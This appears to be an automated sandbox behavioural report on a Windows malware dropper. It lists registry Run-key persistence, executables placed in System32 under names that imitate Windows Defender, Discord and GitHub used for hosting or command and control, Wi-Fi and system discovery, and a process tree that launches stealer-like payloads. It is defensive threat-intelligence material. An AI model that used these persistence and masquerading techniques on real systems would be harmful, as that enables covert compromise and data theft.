"C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
flow ioc 180 discord.com 26 raw.githubusercontent.com 27 raw.githubusercontent.com 61 discord.com 81 discord.com 139 discord.com 140 discord.com 168 discord.com 181 discord.com 60 discord.com 80 discord.com 169 discord.com -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 78 ip-api.com 91 ip-api.com 116 ip-api.com 132 ip-api.com 166 ip-api.com 178 ip-api.com 30 ip-api.com 55 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\java.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\java.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\java.exe cmd.exe File opened for modification C:\Windows\system32\java.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\SubDir\x.exe x.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\SubDir\x.exe x.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File opened for modification C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDataUpdater.exe cmd.exe File created C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe cmd.exe -
Enumerates processes with tasklist 1 TTPs 25 IoCs
pid Process 5636 Process not Found 996 Process not Found 6080 tasklist.exe 736 tasklist.exe 3492 tasklist.exe 4300 tasklist.exe 5872 tasklist.exe 4900 Process not Found 5324 tasklist.exe 4692 tasklist.exe 1276 tasklist.exe 5476 tasklist.exe 5972 tasklist.exe 5148 tasklist.exe 5388 tasklist.exe 700 Process not Found 940 tasklist.exe 5780 tasklist.exe 2640 tasklist.exe 5468 tasklist.exe 1536 tasklist.exe 3452 tasklist.exe 2764 tasklist.exe 1588 tasklist.exe 3544 tasklist.exe -
resource yara_rule behavioral4/files/0x0008000000023bfc-161.dat upx behavioral4/memory/3108-168-0x00007FFE52820000-0x00007FFE52C85000-memory.dmp upx behavioral4/files/0x0008000000023bcc-173.dat upx behavioral4/files/0x000a000000023b7c-172.dat upx behavioral4/memory/3108-210-0x00007FFE685D0000-0x00007FFE685DF000-memory.dmp upx behavioral4/memory/3108-209-0x00007FFE59610000-0x00007FFE59634000-memory.dmp upx behavioral4/memory/3108-224-0x00007FFE583E0000-0x00007FFE58551000-memory.dmp upx behavioral4/memory/3108-227-0x00007FFE58ED0000-0x00007FFE58EFE000-memory.dmp upx behavioral4/memory/3108-232-0x00007FFE52380000-0x00007FFE52498000-memory.dmp upx behavioral4/memory/3108-231-0x00007FFE682C0000-0x00007FFE682CD000-memory.dmp upx behavioral4/memory/3108-230-0x00007FFE58C80000-0x00007FFE58C95000-memory.dmp upx behavioral4/memory/3108-228-0x00007FFE524A0000-0x00007FFE52817000-memory.dmp upx behavioral4/memory/3108-226-0x00007FFE68390000-0x00007FFE6839D000-memory.dmp upx behavioral4/memory/3108-225-0x00007FFE58F00000-0x00007FFE58F19000-memory.dmp upx behavioral4/memory/3108-229-0x00007FFE58320000-0x00007FFE583D7000-memory.dmp upx behavioral4/memory/3108-223-0x00007FFE5EA70000-0x00007FFE5EA8E000-memory.dmp upx behavioral4/memory/3108-222-0x00007FFE5F160000-0x00007FFE5F178000-memory.dmp upx behavioral4/memory/3108-221-0x00007FFE58F20000-0x00007FFE58F4C000-memory.dmp upx behavioral4/memory/3108-234-0x00007FFE52820000-0x00007FFE52C85000-memory.dmp upx behavioral4/memory/3108-257-0x00007FFE59610000-0x00007FFE59634000-memory.dmp upx behavioral4/memory/3744-324-0x00007FFE4FFF0000-0x00007FFE50455000-memory.dmp upx behavioral4/memory/3108-331-0x00007FFE524A0000-0x00007FFE52817000-memory.dmp upx behavioral4/memory/3744-330-0x00007FFE68240000-0x00007FFE6824F000-memory.dmp upx behavioral4/memory/3744-329-0x00007FFE52040000-0x00007FFE52064000-memory.dmp upx behavioral4/memory/3108-328-0x00007FFE583E0000-0x00007FFE58551000-memory.dmp upx behavioral4/memory/3108-327-0x00007FFE5EA70000-0x00007FFE5EA8E000-memory.dmp upx behavioral4/memory/3744-341-0x00007FFE51FD0000-0x00007FFE51FEE000-memory.dmp upx behavioral4/memory/3744-340-0x00007FFE51FF0000-0x00007FFE52008000-memory.dmp upx behavioral4/memory/3108-339-0x00007FFE58320000-0x00007FFE583D7000-memory.dmp upx behavioral4/memory/3744-338-0x00007FFE52010000-0x00007FFE5203C000-memory.dmp upx behavioral4/memory/3108-337-0x00007FFE58ED0000-0x00007FFE58EFE000-memory.dmp upx behavioral4/memory/3108-336-0x00007FFE58F00000-0x00007FFE58F19000-memory.dmp upx behavioral4/memory/3744-342-0x00007FFE51750000-0x00007FFE518C1000-memory.dmp upx behavioral4/memory/3744-343-0x00007FFE51FB0000-0x00007FFE51FC9000-memory.dmp upx behavioral4/memory/3744-346-0x00007FFE4FFF0000-0x00007FFE50455000-memory.dmp upx behavioral4/memory/3744-347-0x00007FFE51690000-0x00007FFE51747000-memory.dmp upx behavioral4/memory/3744-350-0x00007FFE52040000-0x00007FFE52064000-memory.dmp upx behavioral4/memory/3744-353-0x00007FFE67AB0000-0x00007FFE67ABD000-memory.dmp upx behavioral4/memory/3744-352-0x00007FFE51F90000-0x00007FFE51FA5000-memory.dmp upx behavioral4/memory/3744-348-0x00007FFE4F880000-0x00007FFE4FBF7000-memory.dmp upx behavioral4/memory/3744-345-0x00007FFE51F40000-0x00007FFE51F6E000-memory.dmp upx behavioral4/memory/3744-344-0x00007FFE67BA0000-0x00007FFE67BAD000-memory.dmp upx behavioral4/memory/3744-382-0x00007FFE51690000-0x00007FFE51747000-memory.dmp upx behavioral4/memory/3744-381-0x00007FFE51F40000-0x00007FFE51F6E000-memory.dmp upx behavioral4/memory/3744-380-0x00007FFE67BA0000-0x00007FFE67BAD000-memory.dmp upx behavioral4/memory/3744-379-0x00007FFE51FB0000-0x00007FFE51FC9000-memory.dmp upx behavioral4/memory/3744-378-0x00007FFE51750000-0x00007FFE518C1000-memory.dmp upx behavioral4/memory/3744-377-0x00007FFE51FD0000-0x00007FFE51FEE000-memory.dmp upx behavioral4/memory/3744-376-0x00007FFE52010000-0x00007FFE5203C000-memory.dmp upx behavioral4/memory/3744-375-0x00007FFE68240000-0x00007FFE6824F000-memory.dmp upx behavioral4/memory/3744-374-0x00007FFE52040000-0x00007FFE52064000-memory.dmp upx behavioral4/memory/3744-373-0x00007FFE4FFF0000-0x00007FFE50455000-memory.dmp upx behavioral4/memory/3744-369-0x00007FFE4F880000-0x00007FFE4FBF7000-memory.dmp upx behavioral4/memory/3744-372-0x00007FFE51FF0000-0x00007FFE52008000-memory.dmp upx behavioral4/memory/3744-371-0x00007FFE67AB0000-0x00007FFE67ABD000-memory.dmp upx behavioral4/memory/3744-370-0x00007FFE51F90000-0x00007FFE51FA5000-memory.dmp upx behavioral4/memory/5292-507-0x00007FFE4E620000-0x00007FFE4EA85000-memory.dmp upx behavioral4/memory/5292-514-0x00007FFE51EB0000-0x00007FFE51ED4000-memory.dmp upx behavioral4/memory/5292-515-0x00007FFE67AB0000-0x00007FFE67ABF000-memory.dmp upx behavioral4/memory/5292-522-0x00007FFE51E90000-0x00007FFE51EA8000-memory.dmp upx behavioral4/memory/5292-524-0x00007FFE50FB0000-0x00007FFE51121000-memory.dmp upx behavioral4/memory/5292-523-0x00007FFE51A00000-0x00007FFE51A1E000-memory.dmp upx behavioral4/memory/5292-525-0x00007FFE51710000-0x00007FFE51729000-memory.dmp upx behavioral4/memory/5292-521-0x00007FFE51F10000-0x00007FFE51F3C000-memory.dmp upx -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2528 Process not Found 4484 Process not Found -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jtkhikadjthsad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language onetap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LummaC22222.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jerniuiopu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 10 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1568 netsh.exe 2852 netsh.exe 2516 cmd.exe 5880 Process not Found 408 cmd.exe 840 cmd.exe 4372 netsh.exe 4952 cmd.exe 4948 netsh.exe 5556 Process not Found -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 jtkhikadjthsad.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString jtkhikadjthsad.exe -
Delays execution with timeout.exe 64 IoCs
pid Process 5940 timeout.exe 5684 timeout.exe 1016 timeout.exe 5952 timeout.exe 5160 timeout.exe 3452 timeout.exe 2272 timeout.exe 1128 timeout.exe 5880 timeout.exe 4068 timeout.exe 5552 timeout.exe 5516 timeout.exe 3000 timeout.exe 2972 timeout.exe 3348 timeout.exe 5272 timeout.exe 5336 timeout.exe 4848 timeout.exe 1516 Process not Found 1016 timeout.exe 1136 timeout.exe 5504 timeout.exe 1300 timeout.exe 5564 timeout.exe 5872 timeout.exe 6092 timeout.exe 4184 timeout.exe 3852 timeout.exe 5504 timeout.exe 3584 Process not Found 5708 timeout.exe 4620 Process not Found 5644 timeout.exe 1256 timeout.exe 392 timeout.exe 4204 timeout.exe 1016 timeout.exe 908 timeout.exe 5724 timeout.exe 6032 timeout.exe 4188 Process not Found 1744 timeout.exe 3912 Process not Found 3708 timeout.exe 4832 timeout.exe 5872 timeout.exe 3056 timeout.exe 1768 timeout.exe 2256 timeout.exe 844 Process not Found 5460 timeout.exe 5232 timeout.exe 5660 timeout.exe 6116 timeout.exe 380 timeout.exe 5852 timeout.exe 400 timeout.exe 6000 timeout.exe 3056 timeout.exe 5268 timeout.exe 3096 timeout.exe 2560 timeout.exe 5280 Process not Found 5740 Process not Found -
Detects videocard installed 1 TTPs 15 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5768 Process not Found 5428 WMIC.exe 6100 WMIC.exe 6052 Process not Found 2820 WMIC.exe 4888 WMIC.exe 5504 WMIC.exe 744 WMIC.exe 3348 WMIC.exe 5840 WMIC.exe 2072 WMIC.exe 3160 Process not Found 5976 WMIC.exe 4368 WMIC.exe 5992 WMIC.exe -
Gathers system information 1 TTPs 5 IoCs
Runs systeminfo.exe.
pid Process 4304 systeminfo.exe 1464 systeminfo.exe 3188 systeminfo.exe 3736 systeminfo.exe 5552 Process not Found -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4124 Process not Found -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5012 schtasks.exe 1580 schtasks.exe 1700 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2684 powershell.exe 2684 powershell.exe 3328 powershell.exe 3328 powershell.exe 2684 powershell.exe 3328 powershell.exe 2480 powershell.exe 2480 powershell.exe 1552 powershell.exe 1552 powershell.exe 2480 powershell.exe 1552 powershell.exe 5896 powershell.exe 5896 powershell.exe 5896 powershell.exe 5696 powershell.exe 5696 powershell.exe 5696 powershell.exe 2436 powershell.exe 2436 powershell.exe 2436 powershell.exe 3096 powershell.exe 3096 powershell.exe 3096 powershell.exe 5972 powershell.exe 5972 powershell.exe 4512 powershell.exe 4512 powershell.exe 4512 powershell.exe 5972 powershell.exe 5804 powershell.exe 5804 powershell.exe 5804 powershell.exe 1576 powershell.exe 1576 powershell.exe 1576 powershell.exe 228 powershell.exe 228 powershell.exe 228 powershell.exe 4288 powershell.exe 4288 powershell.exe 4288 powershell.exe 1100 powershell.exe 1100 powershell.exe 1100 powershell.exe 4356 powershell.exe 4356 powershell.exe 4356 powershell.exe 4288 powershell.exe 4288 powershell.exe 4288 powershell.exe 3536 powershell.exe 3536 powershell.exe 3536 powershell.exe 2248 powershell.exe 2248 powershell.exe 2248 powershell.exe 1276 powershell.exe 1276 powershell.exe 1276 powershell.exe 6052 powershell.exe 6052 powershell.exe 6052 powershell.exe 5340 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1148 4363463463464363463463463.exe Token: SeDebugPrivilege 4736 jerniuiopu.exe Token: SeDebugPrivilege 2888 x.exe Token: SeDebugPrivilege 4388 WindowsDataUpdater.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 3328 powershell.exe Token: SeIncreaseQuotaPrivilege 4964 WMIC.exe Token: SeSecurityPrivilege 4964 WMIC.exe Token: SeTakeOwnershipPrivilege 4964 WMIC.exe Token: SeLoadDriverPrivilege 4964 WMIC.exe Token: SeSystemProfilePrivilege 4964 WMIC.exe Token: SeSystemtimePrivilege 4964 WMIC.exe Token: SeProfSingleProcessPrivilege 4964 WMIC.exe Token: SeIncBasePriorityPrivilege 4964 WMIC.exe Token: SeCreatePagefilePrivilege 4964 WMIC.exe Token: SeBackupPrivilege 4964 WMIC.exe Token: SeRestorePrivilege 4964 WMIC.exe Token: SeShutdownPrivilege 4964 WMIC.exe Token: SeDebugPrivilege 4964 WMIC.exe Token: SeSystemEnvironmentPrivilege 4964 WMIC.exe Token: SeRemoteShutdownPrivilege 4964 WMIC.exe Token: SeUndockPrivilege 4964 WMIC.exe Token: SeManageVolumePrivilege 4964 WMIC.exe Token: 33 4964 WMIC.exe Token: 34 4964 WMIC.exe Token: 35 4964 WMIC.exe Token: 36 4964 WMIC.exe Token: SeDebugPrivilege 940 tasklist.exe Token: SeIncreaseQuotaPrivilege 4964 WMIC.exe Token: SeSecurityPrivilege 4964 WMIC.exe Token: SeTakeOwnershipPrivilege 4964 WMIC.exe Token: SeLoadDriverPrivilege 4964 WMIC.exe Token: SeSystemProfilePrivilege 4964 WMIC.exe Token: SeSystemtimePrivilege 4964 WMIC.exe Token: SeProfSingleProcessPrivilege 4964 WMIC.exe Token: SeIncBasePriorityPrivilege 4964 WMIC.exe Token: SeCreatePagefilePrivilege 4964 WMIC.exe Token: SeBackupPrivilege 4964 WMIC.exe Token: SeRestorePrivilege 4964 WMIC.exe Token: SeShutdownPrivilege 4964 WMIC.exe Token: SeDebugPrivilege 4964 WMIC.exe Token: SeSystemEnvironmentPrivilege 4964 WMIC.exe Token: SeRemoteShutdownPrivilege 4964 WMIC.exe Token: SeUndockPrivilege 4964 WMIC.exe Token: SeManageVolumePrivilege 4964 WMIC.exe Token: 33 4964 WMIC.exe Token: 34 4964 WMIC.exe Token: 35 4964 WMIC.exe Token: 36 4964 WMIC.exe Token: SeDebugPrivilege 1740 WindowsDataUpdater.exe Token: SeIncreaseQuotaPrivilege 2820 WMIC.exe Token: SeSecurityPrivilege 2820 WMIC.exe Token: SeTakeOwnershipPrivilege 2820 WMIC.exe Token: SeLoadDriverPrivilege 2820 WMIC.exe Token: SeSystemProfilePrivilege 2820 WMIC.exe Token: SeSystemtimePrivilege 2820 WMIC.exe Token: SeProfSingleProcessPrivilege 2820 WMIC.exe Token: SeIncBasePriorityPrivilege 2820 WMIC.exe Token: SeCreatePagefilePrivilege 2820 WMIC.exe Token: SeBackupPrivilege 2820 WMIC.exe Token: SeRestorePrivilege 2820 WMIC.exe Token: SeShutdownPrivilege 2820 WMIC.exe Token: SeDebugPrivilege 2820 WMIC.exe Token: SeSystemEnvironmentPrivilege 2820 WMIC.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4736 jerniuiopu.exe 4388 WindowsDataUpdater.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1148 wrote to memory of 1468 1148 4363463463464363463463463.exe 84 PID 1148 wrote to memory of 1468 1148 4363463463464363463463463.exe 84 PID 1148 wrote to memory of 4420 1148 4363463463464363463463463.exe 85 PID 1148 wrote to memory of 4420 1148 4363463463464363463463463.exe 85 PID 1148 wrote to memory of 4736 1148 4363463463464363463463463.exe 86 PID 1148 wrote to memory of 4736 1148 4363463463464363463463463.exe 86 PID 1148 wrote to memory of 4736 1148 4363463463464363463463463.exe 86 PID 4736 wrote to memory of 5012 4736 jerniuiopu.exe 90 PID 4736 wrote to memory of 5012 4736 jerniuiopu.exe 90 PID 4736 wrote to memory of 5012 4736 jerniuiopu.exe 90 PID 1148 wrote to memory of 4516 1148 4363463463464363463463463.exe 92 PID 1148 wrote to memory of 4516 1148 4363463463464363463463463.exe 92 PID 4516 wrote to memory of 4252 4516 Aquarius.exe 93 PID 4516 wrote to memory of 4252 4516 Aquarius.exe 93 PID 4252 wrote to memory of 1308 4252 cmd.exe 97 PID 4252 wrote to memory of 1308 4252 cmd.exe 97 PID 1148 wrote to memory of 2888 1148 4363463463464363463463463.exe 99 PID 1148 wrote to memory of 2888 1148 4363463463464363463463463.exe 99 PID 4252 wrote to memory of 2272 4252 cmd.exe 101 PID 4252 wrote to memory of 2272 4252 cmd.exe 101 PID 4252 wrote to memory of 952 4252 cmd.exe 102 PID 4252 wrote to memory of 952 4252 cmd.exe 102 PID 4252 wrote to memory of 3536 4252 cmd.exe 103 PID 4252 wrote to memory of 3536 4252 cmd.exe 103 PID 4252 wrote to memory of 4416 4252 cmd.exe 104 PID 4252 wrote to memory of 4416 4252 cmd.exe 104 PID 4252 wrote to memory of 3164 4252 cmd.exe 105 PID 4252 wrote to memory of 3164 4252 cmd.exe 105 PID 4252 wrote to memory of 4388 4252 cmd.exe 106 PID 4252 wrote to memory of 4388 4252 cmd.exe 106 PID 3164 wrote to memory of 3108 3164 WindowsDefenderUpdater.exe 107 PID 3164 wrote to memory of 3108 3164 WindowsDefenderUpdater.exe 107 PID 4252 wrote to memory of 3460 4252 cmd.exe 108 PID 4252 wrote to memory of 3460 4252 cmd.exe 108 PID 2888 wrote to memory of 1580 2888 x.exe 109 PID 2888 wrote to memory of 1580 2888 x.exe 109 PID 4252 wrote to memory of 392 4252 cmd.exe 111 PID 4252 wrote to memory of 392 4252 cmd.exe 111 PID 3108 wrote to memory of 4304 3108 WindowsDefenderUpdater.exe 112 PID 3108 wrote to memory of 4304 3108 WindowsDefenderUpdater.exe 112 PID 3108 wrote to memory of 2324 3108 WindowsDefenderUpdater.exe 113 PID 3108 wrote to memory of 2324 3108 WindowsDefenderUpdater.exe 113 PID 3108 wrote to memory of 640 3108 WindowsDefenderUpdater.exe 114 PID 3108 wrote to memory of 640 3108 WindowsDefenderUpdater.exe 114 PID 3460 wrote to memory of 1964 3460 java.exe 115 PID 3460 wrote to memory of 1964 3460 java.exe 115 PID 3108 wrote to memory of 2260 3108 WindowsDefenderUpdater.exe 119 PID 3108 wrote to memory of 2260 3108 WindowsDefenderUpdater.exe 119 PID 4388 wrote to memory of 1700 4388 WindowsDataUpdater.exe 122 PID 4388 wrote to memory of 1700 4388 WindowsDataUpdater.exe 122 PID 3108 wrote to memory of 4988 3108 WindowsDefenderUpdater.exe 123 PID 3108 wrote to memory of 4988 3108 WindowsDefenderUpdater.exe 123 PID 2324 wrote to memory of 3328 2324 cmd.exe 128 PID 2324 wrote to memory of 3328 2324 cmd.exe 128 PID 4304 wrote to memory of 2684 4304 cmd.exe 129 PID 4304 wrote to memory of 2684 4304 cmd.exe 129 PID 4988 wrote to memory of 4964 4988 cmd.exe 130 PID 4988 wrote to memory of 4964 4988 cmd.exe 130 PID 640 wrote to memory of 1976 640 cmd.exe 131 PID 640 wrote to memory of 1976 640 cmd.exe 131 PID 2260 wrote to memory of 940 2260 cmd.exe 132 PID 2260 wrote to memory of 940 2260 cmd.exe 132 PID 1964 wrote to memory of 3396 1964 cmd.exe 133 PID 1964 wrote to memory of 3396 1964 cmd.exe 133 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 10 IoCs
pid Process 5368 attrib.exe 4708 attrib.exe 5480 attrib.exe 1964 attrib.exe 5604 Process not Found 5756 attrib.exe 5776 attrib.exe 5768 attrib.exe 2384 attrib.exe 3708 Process not Found
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\Files\lummnew.exe"C:\Users\Admin\AppData\Local\Temp\Files\lummnew.exe"2⤵
- Executes dropped EXE
PID:1468
-
-
C:\Users\Admin\AppData\Local\Temp\Files\build9.exe"C:\Users\Admin\AppData\Local\Temp\Files\build9.exe"2⤵
- Executes dropped EXE
PID:4420
-
-
